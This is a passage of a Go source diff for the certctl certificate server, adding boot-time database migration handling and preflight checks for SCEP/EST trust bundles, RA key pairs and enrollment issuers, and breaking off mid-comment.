// RunDemoSeed gating, the per-step success/skip log lines — are
|
||||||
|
// byte-identical to the pre-Sprint-8b inline form. Verified via
|
||||||
|
// `go test ./cmd/server/... -count=1 -short` (which runs the
|
||||||
|
// existing main_test.go assertions through the new call site).
|
||||||
|
//
|
||||||
|
// Why this is a separate commit
|
||||||
|
// =============================
|
||||||
|
// Sprint 8a (commit see git log) extracted the bottom-of-file
|
||||||
|
// helpers + adapter types — pure mechanical relocation that
|
||||||
|
// couldn't change runtime semantics. Sprint 8b crosses the boundary
|
||||||
|
// where mechanical relocation ends: introducing a new function
|
||||||
|
// call frame changes defer scope, panic recovery, and (in this
|
||||||
|
// case) the exit semantics for the --migrate-only path. The
|
||||||
|
// Phase 9 prompt's "refactor is mechanical relocation; behavior
|
||||||
|
// change is a separate concern" rule guards against exactly this
|
||||||
|
// shape of risk being landed without a focused review.
|
||||||
|
//
|
||||||
|
// Splitting Sprint 8a (mechanical) from Sprint 8b (behavior-aware)
|
||||||
|
// means the operator's git log shows:
|
||||||
|
// 3f1344e8 ... wire.go — no behavior change possible
|
||||||
|
// <this> ... migrations.go — one specific behavior shift,
|
||||||
|
// documented + intentional
|
||||||
|
//
|
||||||
|
// Anyone bisecting a future bug to one of these two commits gets a
|
||||||
|
// clean "is it mechanical or did the behavior change" signal.
|
||||||
|
|
||||||
|
// parseMigrateOnlyFlag scans os.Args for the `--migrate-only` token and
// returns true if found. Hand-parsed instead of using flag.Parse because:
//
//  1. The server's entire config surface is env-var driven via
//     config.Load(). flag.Parse() introduces a global package-state
//     dependency that future binaries importing cmd/server (test
//     harnesses, CLI tools, embedded variants) would have to
//     coordinate around.
//  2. The only flag we care about is the migration-vs-server-lifecycle
//     toggle; a hand-parser is a handful of lines and has no transitive cost.
//  3. The flag is Helm-pre-install-hook-facing (see
//     deploy/helm/certctl/templates/migration-job.yaml). Its shape is
//     pinned by that template, not by anything else; we don't need
//     flag.Parse's auto-help generation or type coercion.
//
// Bare arg match — no `=` value form, no short alias, no override from env.
// Passing `--migrate-only` at any position after the program name
// (os.Args[0] is never inspected) flips the flag on.
//
// The scan indexes from 1 instead of slicing os.Args[1:], so an empty or nil
// os.Args (possible when the process is exec'd with argc == 0, or when a test
// harness resets os.Args) yields false rather than a slice-bounds panic.
func parseMigrateOnlyFlag() bool {
	for i := 1; i < len(os.Args); i++ {
		if os.Args[i] == "--migrate-only" {
			return true
		}
	}
	return false
}
|
||||||
|
|
||||||
|
// runBootMigrations owns the Phase 4 DEPL-M1 boot-time migration
|
||||||
|
// posture. Three lifecycles to support:
|
||||||
|
//
|
||||||
|
// (a) Compose / VM / bare-metal: server runs migrations at boot.
|
||||||
|
// Default behavior — preserved unchanged.
|
||||||
|
// (b) Helm with pre-install/pre-upgrade hook: the migration Job
|
||||||
|
// runs `certctl-server --migrate-only`, does its work, and
|
||||||
|
// exits. The server Deployment's pods then start with
|
||||||
|
// CERTCTL_MIGRATIONS_VIA_HOOK=true set; they see the env
|
||||||
|
// var and skip their boot-time RunMigrations call so the
|
||||||
|
// Job's work isn't duplicated.
|
||||||
|
// (c) Bare `certctl-server --migrate-only` invocation (e.g.
|
||||||
|
// operator running a one-shot migration from the CLI):
|
||||||
|
// runs migrations + seed and returns true so main returns
|
||||||
|
// cleanly without starting the HTTP listener / scheduler /
|
||||||
|
// signing setup.
|
||||||
|
//
|
||||||
|
// migrateOnly captures case (c); CERTCTL_MIGRATIONS_VIA_HOOK
|
||||||
|
// captures case (b). Both paths converge on the same RunMigrations
|
||||||
|
// + RunSeed code below.
|
||||||
|
//
|
||||||
|
// Returns true ONLY when migrateOnly is set; caller (main) handles
|
||||||
|
// the clean exit via `return` so deferred cleanup (db.Close) runs.
|
||||||
|
// Returns false in every other case — caller continues normal boot.
|
||||||
|
// On any migration / seed error: os.Exit(1) inline (matches the
|
||||||
|
// pre-extraction shape; recovery is not possible at this boot
|
||||||
|
// stage).
|
||||||
|
func runBootMigrations(cfg *config.Config, db *sql.DB, logger *slog.Logger, migrateOnly bool) bool {
|
||||||
|
migrationsViaHook := strings.EqualFold(os.Getenv("CERTCTL_MIGRATIONS_VIA_HOOK"), "true")
|
||||||
|
|
||||||
|
if migrateOnly || !migrationsViaHook {
|
||||||
|
logger.Info("running migrations", "path", cfg.Database.MigrationsPath)
|
||||||
|
if err := postgres.RunMigrations(db, cfg.Database.MigrationsPath); err != nil {
|
||||||
|
logger.Error("failed to run migrations", "error", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
logger.Info("migrations completed")
|
||||||
|
} else {
|
||||||
|
logger.Info("skipping migrations at boot (CERTCTL_MIGRATIONS_VIA_HOOK=true — Helm pre-install/pre-upgrade hook owns this work)")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Apply baseline seed data.
|
||||||
|
//
|
||||||
|
// U-3 (P1, cat-u-seed_initdb_schema_drift): pre-U-3 seed.sql was mounted
|
||||||
|
// into postgres `/docker-entrypoint-initdb.d/` alongside a hand-curated
|
||||||
|
// subset of migrations. Adding a migration that introduced a new column
|
||||||
|
// referenced by seed.sql (cat-o-retry_interval_unit_mismatch /
|
||||||
|
// policy_rules.severity / etc.) without also updating the compose volume
|
||||||
|
// mounts caused initdb to crash on first up. Post-U-3 the compose stack
|
||||||
|
// drops all initdb mounts; postgres comes up with empty schema, the
|
||||||
|
// server runs RunMigrations above, then this RunSeed call lands the
|
||||||
|
// baseline data — all from a single source of truth (this binary).
|
||||||
|
// See internal/repository/postgres/db.go::RunSeed for the contract.
|
||||||
|
//
|
||||||
|
// Phase 4 DEPL-M1: same migration-via-hook gating as RunMigrations.
|
||||||
|
// When the hook owns migrations it also owns the seed pass.
|
||||||
|
if migrateOnly || !migrationsViaHook {
|
||||||
|
logger.Info("applying baseline seed", "path", cfg.Database.MigrationsPath)
|
||||||
|
if err := postgres.RunSeed(db, cfg.Database.MigrationsPath); err != nil {
|
||||||
|
logger.Error("failed to apply seed data", "error", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
logger.Info("seed completed")
|
||||||
|
} else {
|
||||||
|
logger.Info("skipping baseline seed at boot (CERTCTL_MIGRATIONS_VIA_HOOK=true — hook applies seed alongside migrations)")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Phase 4 DEPL-M1: --migrate-only early-exit. Migrations + seed are
|
||||||
|
// done; the operator only asked for the migration pass. Signal main
|
||||||
|
// to return cleanly so deferred db.Close runs (Sprint 8b improvement
|
||||||
|
// over the pre-extraction os.Exit(0) which skipped defers).
|
||||||
|
if migrateOnly {
|
||||||
|
logger.Info("--migrate-only: migrations + seed complete; exiting without starting server lifecycle")
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// Apply demo overlay seed when CERTCTL_DEMO_SEED=true. Pre-U-3 the demo
|
||||||
|
// overlay (deploy/docker-compose.demo.yml) mounted seed_demo.sql into
|
||||||
|
// postgres `/docker-entrypoint-initdb.d/`; that broke once U-3 dropped
|
||||||
|
// the initdb migration mounts (the demo seed references tables that
|
||||||
|
// wouldn't exist at initdb time). The runtime path here is the
|
||||||
|
// post-U-3 replacement. Default-off so a vanilla deploy never lands
|
||||||
|
// fake-history rows. See postgres.RunDemoSeed for the contract.
|
||||||
|
if cfg.Database.DemoSeed {
|
||||||
|
logger.Info("applying demo seed (CERTCTL_DEMO_SEED=true)", "path", cfg.Database.MigrationsPath)
|
||||||
|
if err := postgres.RunDemoSeed(db, cfg.Database.MigrationsPath); err != nil {
|
||||||
|
logger.Error("failed to apply demo seed data", "error", err)
|
||||||
|
os.Exit(1)
|
||||||
|
}
|
||||||
|
logger.Info("demo seed completed")
|
||||||
|
}
|
||||||
|
|
||||||
|
return false
|
||||||
|
}
|
||||||
@@ -0,0 +1,758 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"crypto"
|
||||||
|
"crypto/tls"
|
||||||
|
"crypto/x509"
|
||||||
|
"encoding/pem"
|
||||||
|
"fmt"
|
||||||
|
"log/slog"
|
||||||
|
"net/http"
|
||||||
|
"os"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/api/handler"
|
||||||
|
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/auth/session"
|
||||||
|
userdomain "github.com/certctl-io/certctl/internal/auth/user/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
authdomainAlias "github.com/certctl-io/certctl/internal/domain/auth"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository/postgres"
|
||||||
|
"github.com/certctl-io/certctl/internal/scep/intune"
|
||||||
|
"github.com/certctl-io/certctl/internal/service"
|
||||||
|
authsvc "github.com/certctl-io/certctl/internal/service/auth"
|
||||||
|
"github.com/certctl-io/certctl/internal/trustanchor"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 8 (2026-05-14): extracted from
|
||||||
|
// cmd/server/main.go. Different shape from the config.go cuts —
|
||||||
|
// the move is by FUNCTIONAL CONCERN (boot-time preflight + DI
|
||||||
|
// adapter wiring), not by TYPE FAMILY.
|
||||||
|
//
|
||||||
|
// Sprint 8 ships TWO of the three files the Phase 9 prompt names:
|
||||||
|
// - main.go — entrypoint (unchanged; what's left after the cut)
|
||||||
|
// - wire.go — this file (DI assembly: preflight helpers +
|
||||||
|
// adapter types that bridge package boundaries)
|
||||||
|
//
|
||||||
|
// The third file the prompt names — migrations.go — is NOT in this
|
||||||
|
// commit. See "What's NOT in this sprint" below for the deferral
|
||||||
|
// rationale.
|
||||||
|
//
|
||||||
|
// What lives here
|
||||||
|
// ===============
|
||||||
|
// Eight preflight + DI helper functions:
|
||||||
|
// - preflightSCEPChallengePassword (H-2 fix: SCEP needs non-empty
|
||||||
|
// shared secret if enabled)
|
||||||
|
// - preflightSCEPMTLSTrustBundle (SCEP Phase 6.5: per-profile
|
||||||
|
// mTLS CA bundle validation)
|
||||||
|
// - preflightESTMTLSClientCATrustBundle (EST Phase 2.5: same shape,
|
||||||
|
// returns SIGHUP-reloadable
|
||||||
|
// *trustanchor.Holder)
|
||||||
|
// - preflightSCEPIntuneTrustAnchor (SCEP Phase 8.2: Intune
|
||||||
|
// Connector signing-cert bundle)
|
||||||
|
// - loadSCEPRAPair (post-preflight cert+key load)
|
||||||
|
// - preflightSCEPRACertKey (RA cert/key validation: file
|
||||||
|
// mode 0600, cert+key match,
|
||||||
|
// NotAfter, RSA-or-ECDSA alg)
|
||||||
|
// - preflightEnrollmentIssuer (L-005: EST/SCEP issuer can
|
||||||
|
// serve GetCACertPEM)
|
||||||
|
// - buildFinalHandler (M-001 option D: HTTP dispatch
|
||||||
|
// wrapper routing
|
||||||
|
// authenticated vs no-auth
|
||||||
|
// chains by URL prefix)
|
||||||
|
//
|
||||||
|
// Five adapter types that bridge package boundaries (avoid import
|
||||||
|
// cycles between internal/auth, internal/service/auth,
|
||||||
|
// internal/api/handler, internal/auth/oidc, internal/auth/session,
|
||||||
|
// internal/auth/breakglass):
|
||||||
|
// - authPermissionCheckerAdapter (typed-string → plain-string
|
||||||
|
// auth.PermissionChecker
|
||||||
|
// interface)
|
||||||
|
// - authCheckResolverAdapter (postgres ActorRoleRepository
|
||||||
|
// → handler.AuthCheckResolver)
|
||||||
|
// - sessionMinterAdapter (session.Service → OIDC
|
||||||
|
// SessionMinter port)
|
||||||
|
// - breakglassSessionMinterAdapter (session.Service → breakglass
|
||||||
|
// SessionMinter port + audit
|
||||||
|
// 2026-05-10 HIGH-1 revoke-all)
|
||||||
|
// - oidcProvidersListAdapter (postgres OIDCProviderRepository
|
||||||
|
// → handler.OIDCProvidersListResolver
|
||||||
|
// with MED-9 enabled-filter)
|
||||||
|
//
|
||||||
|
// Plus the silenceUnusedImports var-block that pins
|
||||||
|
// oidcdomain.OIDCProvider as a load-bearing reference (the adapter
|
||||||
|
// types use *userdomain.User and repository.OIDCProviderRepository
|
||||||
|
// indirectly; oidcdomain.OIDCProvider isn't named in any function
|
||||||
|
// signature here but is part of the Phase 3 SessionMinter contract).
|
||||||
|
//
|
||||||
|
// What's NOT in this sprint (and why)
|
||||||
|
// ===================================
|
||||||
|
// migrations.go is deferred. The Phase 9 prompt asks for three files:
|
||||||
|
// main.go (entrypoint) + wire.go (this file) + migrations.go (boot-
|
||||||
|
// time migration handling). The migration code (Phase 4 DEPL-M1
|
||||||
|
// --migrate-only flag handling + RunMigrations + RunSeed call +
|
||||||
|
// CERTCTL_MIGRATIONS_VIA_HOOK gating) lives INLINE inside the 2300-
|
||||||
|
// line main() function — lines ~59-264 in the original — not as a
|
||||||
|
// standalone helper.
|
||||||
|
//
|
||||||
|
// Extracting it into a migrations.go would require:
|
||||||
|
// 1. Creating a new unexported function (e.g.,
|
||||||
|
// runMigrations(ctx, cfg, db, logger) error) that consolidates
|
||||||
|
// lines ~71-77 (--migrate-only parse) + ~199-248 (the migration
|
||||||
|
// branch + --migrate-only early-exit) + ~250-264 (the demo
|
||||||
|
// overlay seed branch).
|
||||||
|
// 2. Replacing the inline block in main() with a single call.
|
||||||
|
// 3. Threading the early-exit semantics out (os.Exit(0) vs return
|
||||||
|
// "migration done" sentinel error vs a third option) so main's
|
||||||
|
// defer ordering doesn't change.
|
||||||
|
//
|
||||||
|
// That's behavior-change territory — a new function call frame, a
|
||||||
|
// new defer scope, error-handling pattern shift. Different risk
|
||||||
|
// shape from the pure-data type relocations Sprints 1-7 did. The
|
||||||
|
// Phase 9 prompt says "Do NOT change exported type signatures; the
|
||||||
|
// refactor is mechanical relocation; behavior change is a separate
|
||||||
|
// concern." Extracting an inline block from main() into a new
|
||||||
|
// function is the same shape of risk that rule was guarding against.
|
||||||
|
//
|
||||||
|
// Recommended path for the migrations.go cut:
|
||||||
|
// - Land it as a separate, smaller PR with its own review focus
|
||||||
|
// (the runMigrations function shape, the early-exit semantics,
|
||||||
|
// unit tests for the new function via the existing main_test.go
|
||||||
|
// fixture). The infrastructure for the PR exists today; only
|
||||||
|
// the operator's go-ahead on the behavior-change risk is needed.
|
||||||
|
// - Estimated impact: another ~80-120 LOC out of main.go (the
|
||||||
|
// migration + seed + early-exit block) into a new migrations.go.
|
||||||
|
// - Phase 4's --migrate-only code path already runs through this
|
||||||
|
// code section, so the extracted function should reproduce that
|
||||||
|
// exact flow without behavior change beyond the call-frame
|
||||||
|
// introduction.
|
||||||
|
//
|
||||||
|
// Public-surface invariant
|
||||||
|
// ========================
|
||||||
|
// The moved helpers + adapter types are all in package `main`
|
||||||
|
// (which Go cannot expose to external importers). No exported
|
||||||
|
// surface changes. The reorganization is invisible outside
|
||||||
|
// cmd/server/. Same-package callers in main.go (preflight*
|
||||||
|
// invocations, adapter instantiation) resolve via the package
|
||||||
|
// symbol table without modification.
|
||||||
|
|
||||||
|
// preflightSCEPChallengePassword is the boot-time gate for the H-2 fix. With
// SCEP enabled it insists on a non-empty challenge password and returns an
// error when the password is empty (CWE-306, missing authentication for a
// critical function). With SCEP disabled it returns nil without looking at
// the password.
//
// The function only builds the error; logging it and terminating the process
// is left to the caller, which keeps this check unit-testable without booting
// the server.
func preflightSCEPChallengePassword(enabled bool, challengePassword string) error {
	if enabled && challengePassword == "" {
		return fmt.Errorf("SCEP enabled but CERTCTL_SCEP_CHALLENGE_PASSWORD is empty: " +
			"SCEP enrollment would accept any client (CWE-306); " +
			"configure a non-empty shared secret or set CERTCTL_SCEP_ENABLED=false")
	}
	return nil
}
|
||||||
|
|
||||||
|
// preflightSCEPMTLSTrustBundle loads and vets a per-profile mTLS client-CA
// trust bundle at boot (SCEP RFC 8894 + Intune master bundle Phase 6.5).
//
// When enabled is false it returns (nil, nil). Otherwise it fails on the first
// problem found:
//
//  1. bundlePath is empty.
//  2. The file cannot be read.
//  3. A CERTIFICATE PEM block does not parse as an X.509 certificate.
//  4. A certificate's NotAfter is already in the past (the error names the
//     subject CommonName and the expiry time).
//  5. The file holds no CERTIFICATE blocks at all.
//
// PEM blocks of any other type are skipped. On success the returned pool
// contains every certificate from the bundle; the caller decides where to
// install it and how to react to an error.
func preflightSCEPMTLSTrustBundle(enabled bool, bundlePath string) (*x509.CertPool, error) {
	switch {
	case !enabled:
		return nil, nil
	case bundlePath == "":
		return nil, fmt.Errorf("MTLS enabled but trust bundle path empty: " +
			"set CERTCTL_SCEP_PROFILE_<NAME>_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH to a PEM file " +
			"containing the bootstrap-CA certs the operator allows to enroll")
	}

	raw, err := os.ReadFile(bundlePath)
	if err != nil {
		return nil, fmt.Errorf("read MTLS trust bundle: %w (path=%s)", err, bundlePath)
	}

	trusted := x509.NewCertPool()
	added := 0
	// One timestamp for the whole bundle so every cert is judged against the
	// same instant.
	checkedAt := time.Now()

	// Walk the file one PEM block at a time; pem.Decode returns a nil block
	// once no further PEM data is found.
	for blk, remaining := pem.Decode(raw); blk != nil; blk, remaining = pem.Decode(remaining) {
		if blk.Type != "CERTIFICATE" {
			continue
		}
		anchor, parseErr := x509.ParseCertificate(blk.Bytes)
		if parseErr != nil {
			return nil, fmt.Errorf("parse MTLS trust bundle cert: %w (path=%s)", parseErr, bundlePath)
		}
		if checkedAt.After(anchor.NotAfter) {
			return nil, fmt.Errorf("MTLS trust bundle cert expired at %s (subject=%q, path=%s) — replace before restart",
				anchor.NotAfter.Format(time.RFC3339), anchor.Subject.CommonName, bundlePath)
		}
		trusted.AddCert(anchor)
		added++
	}

	if added == 0 {
		return nil, fmt.Errorf("MTLS trust bundle contained no CERTIFICATE PEM blocks (path=%s)", bundlePath)
	}
	return trusted, nil
}
|
||||||
|
|
||||||
|
// preflightESTMTLSClientCATrustBundle validates a per-profile EST mTLS
|
||||||
|
// client-CA trust bundle and returns a SIGHUP-reloadable holder.
|
||||||
|
//
|
||||||
|
// EST RFC 7030 hardening master bundle Phase 2.5.
|
||||||
|
//
|
||||||
|
// Mirrors preflightSCEPMTLSTrustBundle's checks (file exists, parses as
|
||||||
|
// PEM, ≥1 cert, none expired) but returns a *trustanchor.Holder rather
|
||||||
|
// than a raw *x509.CertPool — the EST handler stores the holder so a
|
||||||
|
// SIGHUP rotates the trust bundle live without a server restart, exactly
|
||||||
|
// the way the Intune trust anchor rotation works (Phase 8.5 of the SCEP
|
||||||
|
// bundle). The handler-side .Pool() accessor on the holder rebuilds an
|
||||||
|
// x509.CertPool from the current snapshot for each Verify call.
|
||||||
|
//
|
||||||
|
// Uses the shared internal/trustanchor.LoadBundle (extracted in EST
|
||||||
|
// hardening Phase 2.1 from the original Intune-only path) so the EST
|
||||||
|
// + Intune callers exercise the same loader semantics — empty bundle
|
||||||
|
// rejected, expired cert rejected with subject in error message,
|
||||||
|
// non-CERTIFICATE PEM blocks tolerated.
|
||||||
|
func preflightESTMTLSClientCATrustBundle(enabled bool, pathID, bundlePath string, logger *slog.Logger) (*trustanchor.Holder, error) {
|
||||||
|
if !enabled {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
if bundlePath == "" {
|
||||||
|
return nil, fmt.Errorf("EST profile (PathID=%q) MTLS enabled but trust bundle path empty: "+
|
||||||
|
"set CERTCTL_EST_PROFILE_<NAME>_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH to a PEM file "+
|
||||||
|
"containing the bootstrap-CA certs the operator allows to enroll", pathID)
|
||||||
|
}
|
||||||
|
holder, err := trustanchor.New(bundlePath, logger)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("EST profile (PathID=%q) MTLS trust bundle preflight: %w", pathID, err)
|
||||||
|
}
|
||||||
|
holder.SetLabelForLog(fmt.Sprintf("EST mTLS client CA bundle (PathID=%q)", pathID))
|
||||||
|
return holder, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// preflightSCEPIntuneTrustAnchor validates a per-profile Microsoft Intune
|
||||||
|
// Certificate Connector signing-cert trust bundle.
|
||||||
|
//
|
||||||
|
// SCEP RFC 8894 + Intune master bundle Phase 8.2.
|
||||||
|
//
|
||||||
|
// No-op when this profile has Intune disabled (the common case for
|
||||||
|
// non-Intune SCEP deploys). When enabled:
|
||||||
|
//
|
||||||
|
// 1. Path is non-empty (Validate() refuse covers this too; we re-check
|
||||||
|
// here so the caller can os.Exit(1) with the specific PathID in the
|
||||||
|
// log line).
|
||||||
|
// 2. File exists + readable.
|
||||||
|
// 3. PEM-decodes to ≥1 CERTIFICATE block (intune.LoadTrustAnchor enforces
|
||||||
|
// this and skips non-CERTIFICATE blocks like accidentally-pasted
|
||||||
|
// priv-key blocks).
|
||||||
|
// 4. None of the bundled certs is past NotAfter — an expired Intune
|
||||||
|
// trust anchor would silently reject every Connector challenge at
|
||||||
|
// runtime, which is a much worse failure mode than failing fast at
|
||||||
|
// boot. intune.LoadTrustAnchor enforces this and surfaces the subject
|
||||||
|
// CN in the error message so the operator knows which cert to rotate.
|
||||||
|
//
|
||||||
|
// On success returns the freshly-built *intune.TrustAnchorHolder ready to
|
||||||
|
// inject into the per-profile SCEPService via SetIntuneIntegration. The
|
||||||
|
// holder also installs the SIGHUP watcher (started by the caller).
|
||||||
|
func preflightSCEPIntuneTrustAnchor(enabled bool, pathID, path string, logger *slog.Logger) (*intune.TrustAnchorHolder, error) {
|
||||||
|
if !enabled {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
// pathIDLabel renders the empty-string PathID as "<root>" so the
|
||||||
|
// operator's boot-log error doesn't read like a missing variable.
|
||||||
|
pathIDLabel := pathID
|
||||||
|
if pathIDLabel == "" {
|
||||||
|
pathIDLabel = "<root>"
|
||||||
|
}
|
||||||
|
if path == "" {
|
||||||
|
return nil, fmt.Errorf("SCEP profile (PathID=%q) INTUNE enabled but trust anchor path empty: "+
|
||||||
|
"set CERTCTL_SCEP_PROFILE_<NAME>_INTUNE_CONNECTOR_CERT_PATH to a PEM bundle "+
|
||||||
|
"of the Microsoft Intune Certificate Connector's signing certs", pathIDLabel)
|
||||||
|
}
|
||||||
|
holder, err := intune.NewTrustAnchorHolder(path, logger)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("SCEP profile (PathID=%q) INTUNE trust anchor load failed: %w (path=%s)", pathIDLabel, err, path)
|
||||||
|
}
|
||||||
|
return holder, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// loadSCEPRAPair reads the RA certificate PEM and key PEM from disk and
// returns the parsed certificate together with its private key.
//
// The cert file is read first, then the key file; tls.X509KeyPair then checks
// that the two belong together. The returned certificate is the FIRST
// certificate of the pair as assembled by tls.X509KeyPair, so any further
// certificates in the cert PEM are not returned.
//
// It is meant to run after preflightSCEPRACertKey has accepted the same
// paths, so an error here points at the files having changed in between.
func loadSCEPRAPair(certPath, keyPath string) (*x509.Certificate, crypto.PrivateKey, error) {
	// Read both inputs in a fixed order (cert, then key) so the first failing
	// file determines the error.
	inputs := [...]struct{ what, path string }{
		{"cert", certPath},
		{"key", keyPath},
	}
	var pemData [len(inputs)][]byte
	for i, in := range inputs {
		data, err := os.ReadFile(in.path)
		if err != nil {
			return nil, nil, fmt.Errorf("read RA %s: %w", in.what, err)
		}
		pemData[i] = data
	}

	keyPair, err := tls.X509KeyPair(pemData[0], pemData[1])
	if err != nil {
		return nil, nil, fmt.Errorf("parse RA pair: %w", err)
	}
	if len(keyPair.Certificate) == 0 {
		return nil, nil, fmt.Errorf("RA cert PEM contained no certificate blocks")
	}

	raCert, err := x509.ParseCertificate(keyPair.Certificate[0])
	if err != nil {
		return nil, nil, fmt.Errorf("parse RA cert: %w", err)
	}
	return raCert, keyPair.PrivateKey, nil
}
|
||||||
|
|
||||||
|
// preflightSCEPRACertKey vets the RA certificate/key pair used by the RFC 8894
// SCEP path at boot. It returns nil when enabled is false. Otherwise it fails
// on the first problem found, checking in this order:
//
//  1. Both paths are set.
//  2. The key file can be stat'ed and carries no group/other permission bits
//     (mode & 0o077 must be zero).
//  3. Both files can be read.
//  4. tls.X509KeyPair accepts the pair, i.e. cert and key parse and belong
//     together.
//  5. The first certificate of the pair parses and its NotAfter has not
//     passed.
//  6. That certificate's public-key algorithm is RSA or ECDSA.
//
// Only an error is produced; turning it into a log line and a process exit is
// the caller's job, which keeps this helper unit-testable.
func preflightSCEPRACertKey(enabled bool, raCertPath, raKeyPath string) error {
	if !enabled {
		return nil
	}
	if raCertPath == "" || raKeyPath == "" {
		return fmt.Errorf("SCEP enabled but RA pair missing: " +
			"set CERTCTL_SCEP_RA_CERT_PATH + CERTCTL_SCEP_RA_KEY_PATH " +
			"(RFC 8894 §3.2.2 requires an RA pair so clients can encrypt the " +
			"CSR to the RA cert and the server can sign the CertRep response)")
	}

	// Permission gate runs before any read, so a key with loose permissions is
	// rejected without its bytes being loaded.
	// NOTE(review): the previous comment said this is ignored on Windows, but
	// nothing here skips it and Go appears to report 0666/0444 there, which
	// would trip the gate — confirm Windows is out of scope.
	st, err := os.Stat(raKeyPath)
	if err != nil {
		return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH stat failed: %w (path=%s)", err, raKeyPath)
	}
	if perm := st.Mode().Perm(); perm&0o077 != 0 {
		return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH has insecure permissions %#o; "+
			"RA private key must be mode 0600 (owner read/write only) — "+
			"chmod 0600 %s and restart", perm, raKeyPath)
	}

	certBytes, err := os.ReadFile(raCertPath)
	if err != nil {
		return fmt.Errorf("CERTCTL_SCEP_RA_CERT_PATH read failed: %w (path=%s)", err, raCertPath)
	}
	keyBytes, err := os.ReadFile(raKeyPath)
	if err != nil {
		return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH read failed: %w (path=%s)", err, raKeyPath)
	}

	// One stdlib call covers "cert parses", "key parses" and "key matches the
	// certificate", so those checks are not re-implemented here.
	keyPair, err := tls.X509KeyPair(certBytes, keyBytes)
	if err != nil {
		return fmt.Errorf("RA cert/key pair invalid: %w "+
			"(cert=%s key=%s) — verify the cert and key are matching halves of "+
			"the same RA pair, both PEM-encoded, with the cert containing exactly "+
			"one CERTIFICATE block and the key containing one PRIVATE KEY block",
			err, raCertPath, raKeyPath)
	}
	if len(keyPair.Certificate) == 0 {
		// Belt and braces: guarantees the index below is in range.
		return fmt.Errorf("RA cert PEM at %s contains no certificate blocks", raCertPath)
	}

	// Parse the first certificate again to get at NotAfter and the key
	// algorithm.
	raCert, err := x509.ParseCertificate(keyPair.Certificate[0])
	if err != nil {
		return fmt.Errorf("RA cert at %s does not parse as x509: %w", raCertPath, err)
	}
	if raCert.NotAfter.Before(time.Now()) {
		return fmt.Errorf("RA cert at %s expired at %s — "+
			"generate a fresh RA pair (the SCEP CertRep signature would be "+
			"rejected by every conformant client)", raCertPath, raCert.NotAfter.Format(time.RFC3339))
	}

	// Only RSA and ECDSA RA certificates are accepted; anything else (for
	// example an Ed25519 dev key) is refused here.
	if alg := raCert.PublicKeyAlgorithm; alg != x509.RSA && alg != x509.ECDSA {
		return fmt.Errorf("RA cert at %s uses unsupported public-key algorithm %s — "+
			"RFC 8894 §3.5.2 CMS signing requires RSA or ECDSA",
			raCertPath, alg)
	}
	return nil
}
|
||||||
|
|
||||||
|
// preflightEnrollmentIssuer validates at startup that an EST/SCEP-bound issuer
|
||||||
|
// can actually serve a CA certificate. This closes audit finding L-005:
|
||||||
|
// pre-Bundle-4 the EST/SCEP startup path verified the issuer existed in the
|
||||||
|
// registry but did not verify the issuer TYPE could emit a CA cert. An
|
||||||
|
// operator who bound CERTCTL_EST_ISSUER_ID to an ACME issuer (which does
|
||||||
|
// not have a static CA cert — see internal/connector/issuer/acme/acme.go::
|
||||||
|
// GetCACertPEM returning an explicit error) would boot successfully and
|
||||||
|
// only see failures at the first /est/cacerts request, hiding the misconfig
|
||||||
|
// for hours/days behind a degraded enrollment surface.
|
||||||
|
//
|
||||||
|
// Strategy: call issuerConn.GetCACertPEM(ctx) at startup with a short
|
||||||
|
// timeout. If the issuer can serve a CA cert (local, vault, openssl,
|
||||||
|
// stepca, awsacmpca, etc.), the call succeeds and we proceed. If not
|
||||||
|
// (acme, digicert, sectigo, entrust, googlecas, ejbca, globalsign — most
|
||||||
|
// vendor-CA issuers that hand back chains per-issuance), the call fails
|
||||||
|
// loudly with the connector's own error string, and the caller os.Exit(1)s.
|
||||||
|
//
|
||||||
|
// Returns nil on success, non-nil error suitable for structured logging
|
||||||
|
// + os.Exit(1) by the caller. Caller is responsible for the timeout context.
|
||||||
|
func preflightEnrollmentIssuer(ctx context.Context, protocol, issuerID string, issuerConn service.IssuerConnector) error {
|
||||||
|
if issuerConn == nil {
|
||||||
|
return fmt.Errorf("%s issuer %q: connector is nil", protocol, issuerID)
|
||||||
|
}
|
||||||
|
caCertPEM, err := issuerConn.GetCACertPEM(ctx)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("%s issuer %q: cannot serve CA certificate (%w); "+
|
||||||
|
"choose an issuer type that exposes a static CA chain "+
|
||||||
|
"(local / vault / openssl / stepca / awsacmpca) or disable %s",
|
||||||
|
protocol, issuerID, err, protocol)
|
||||||
|
}
|
||||||
|
if caCertPEM == "" {
|
||||||
|
return fmt.Errorf("%s issuer %q: GetCACertPEM returned empty PEM with no error; "+
|
||||||
|
"choose an issuer type that exposes a static CA chain", protocol, issuerID)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// buildFinalHandler returns the outermost HTTP handler. It looks only at the
